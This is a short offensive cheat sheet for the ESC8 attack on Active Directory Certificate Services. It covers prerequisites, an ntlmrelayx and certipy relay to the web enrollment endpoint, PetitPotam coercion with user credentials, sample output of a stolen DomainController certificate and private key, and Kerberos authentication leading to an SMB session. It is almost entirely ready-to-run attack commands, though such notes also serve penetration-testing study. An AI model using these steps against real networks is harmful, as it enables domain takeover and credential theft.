ESC8
1.0 Prerequisites
- WebEnrollment must be active:
http://$dcip/certsrv - User needs permissions:
EnrollmentRights - Template needs role:
Client Authentication - Template must be active
2.0 Attack
2.1 Prepare relay
impacket-ntlmrelayx -t http://$dcip/certsrv -smb2support --adcs --template DomainController
python PetitPotam.py $yourIP $IPofMachineToAuthenticate -u $user -p $pass2.2 certipy-ad
certipy-ad relay -ca '$TARGET-CA' -template 'DomainController' -target http://$dcipOpen a new Shell and re-enter:
python PetitPotam.py $yourIP $IPofMachineToAuthenticate -u $user -p $pass2.3 Output
[*] Targeting http://$dcip/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[]
DOMAIN\MACHINENAME$
[*] Requesting certificate for 'DOMAIN\\MACHINENAME$' based on the template 'DomainController'
[]
[*] Got certificate with DNS Host Name 'machinename.domain.local'
[*] Certificate object SID is 'S-1-5-21-3034620238-1248435811-572132488-1002'
[*] Saved certificate and private key to 'machinename.pfx'
[*] Exiting...2.4 Authentication and Shell
certipy-ad auth -pfx machinename.pfx -username 'MACHINENAME$' -domain 'domain.local'
export KRB5CCNAME=machinename.ccache
impacket-smbclient @domain.local -no-pass -k